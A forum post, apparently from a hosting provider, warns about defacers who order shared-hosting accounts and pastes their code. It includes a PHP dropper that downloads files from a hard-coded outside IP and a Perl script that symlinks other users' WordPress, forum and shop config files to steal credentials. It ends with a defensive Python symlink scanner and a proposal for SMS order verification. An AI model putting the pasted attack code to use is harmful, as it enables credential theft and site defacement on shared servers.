The Egyptians upload some blabla.php, and it contains:
<?php
$file = fopen(".htaccess" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/htaccess.txt');
$write = fwrite ($file ,$sa);
$file = fopen("user.dz" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/user.txt');
$write = fwrite ($file ,$sa);
$file = fopen("cgi.dz" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/cgi.txt');
$write = fwrite ($file ,$sa);
..... bla bla
fclose($file);
if ($write) {
echo "The File Was Created Successfuly";
}
else {echo"\"error\"";}
chmod("user.dz" , 0755);
chmod("user.dz" , 0755);
chmod("jeentel" , 0755);
chmod("dz.dz" , 0755);
chmod("config.dz" , 0755);
?>
I hope everyone understands what this file does when it is run. Then they run the downloaded files, for example:
#!/usr/bin/perl -I/usr/local/bandmin
print "Content-type: text/html\n\n";
print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>[~] Cyb3r-DZ Config - [~] </title>
<style type="text/css">
.newStyle1 {
font-family: Tahoma;
font-size: x-small;
font-weight: bold;
color: #00FFFF;
text-align: center;
}
</style>
</head>
';
sub lil{
($user) = @_;
$msr = qx{pwd};
$kola=$msr."/".$user;
$kola=~s/\n//g;
symlink('/home/'.$user.'/public_html/includes/configure.php',$kola.'-shop.txt');
symlink('/home/'.$user.'/public_html/amember/config.inc.php',$kola.'-amember.txt');
symlink('/home/'.$user.'/public_html/config.inc.php',$kola.'-amember2.txt');
symlink('/home/'.$user.'/public_html/members/configuration.php',$kola.'-members.txt');
symlink('/home/'.$user.'/public_html/config.php',$kola.'2.txt');
symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'-forum.txt');
symlink('/home/'.$user.'/public_html/admin/conf.php',$kola.'5.txt');
symlink('/home/'.$user.'/public_html/admin/config.php',$kola.'4.txt');
symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'-wp13.txt');
symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'-wp-blog.txt');
symlink('/home/'.$user.'/public_html/conf_global.php',$kola.'6.txt');
symlink('/home/'.$user.'/public_html/include/db.php',$kola.'7.txt');
symlink('/home/'.$user.'/public_html/connect.php',$kola.'8.txt');
... bla bla something..
And they deface a bunch of sites.
A problem like this requires a systemic solution, starting with the server. Come on, admins, give us some good suggestions :)
So this is only for administrators to pay attention to, not users. Probably a lot of people read this forum (I hope also from Verat, Eunet, Orion, etc.); let's not let quasi-hackers like these make fools of us.
The general solution for these fake orders would be some kind of verification; the most reliable is SMS confirmation of the order. I will write an add-on for WHMCS, the well-known customer system, that will send a random code via Clickatell which will have to be entered after ordering for the order to become active, and I will share it here, and anyone who wants to use it further will be able to, wherever they manage to fit it in.
That's all for now.
Good night.
---------------------------------------
On social networks.
http://www.facebook.com/adiswitchdoo
https://twitter.com/#!/adiswitch
---------------------------------------
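For the server-side fix the post asks for, one check an administrator can run (an added example, not part of the original post): a Python scan that lists every symlink under an account's home whose target resolves outside that account, which is the kind of link the Perl script above creates. It assumes the /home/<account>/public_html layout seen in the pasted paths; the account names victim and dropzone and the sample tree are constructed.

```python
import os
import tempfile

def find_escaping_symlinks(home_root):
    """List (link, account, target) for each symlink under home_root/<account>/
    whose resolved target lies outside that account's own directory."""
    home_root = os.path.realpath(home_root)
    findings = []
    for account in sorted(os.listdir(home_root)):
        account_dir = os.path.join(home_root, account)
        if os.path.islink(account_dir) or not os.path.isdir(account_dir):
            continue
        # followlinks=False: report links, never walk through them
        for dirpath, dirnames, filenames in os.walk(account_dir, followlinks=False):
            for name in sorted(dirnames + filenames):
                link = os.path.join(dirpath, name)
                if not os.path.islink(link):
                    continue
                # realpath resolves relative and chained links and still
                # returns a path when the target is missing or unreadable
                target = os.path.realpath(link)
                if os.path.commonpath([target, account_dir]) != account_dir:
                    findings.append((link, account, target))
    return findings

def build_sample_tree(root):
    """Constructed layout: 'victim' and 'dropzone' are made-up account names."""
    victim = os.path.join(root, "victim", "public_html")
    drop = os.path.join(root, "dropzone", "public_html", "tmp")
    os.makedirs(victim)
    os.makedirs(drop)
    with open(os.path.join(victim, "wp-config.php"), "w") as fh:
        fh.write("<?php // constructed sample ?>\n")
    # Link of the kind the Perl script creates: another account's config as .txt
    os.symlink(os.path.join(root, "victim", "public_html", "wp-config.php"),
               os.path.join(drop, "victim-wp13.txt"))
    # Dangling link: the guessed config file does not exist for this account
    os.symlink(os.path.join(root, "victim", "public_html", "config.php"),
               os.path.join(drop, "victim2.txt"))
    # Benign link that stays inside its own account; must not be reported
    os.symlink("tmp", os.path.join(root, "dropzone", "public_html", "cache"))

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        for link, account, target in find_escaping_symlinks(root):
            print(f"{account}: {link} -> {target}")
```

On a real server, call find_escaping_symlinks with the actual home root as a user that can read every account. This only detects the links; Apache's SymLinksIfOwnerMatch option in place of FollowSymLinks is the usual way to stop them from being served.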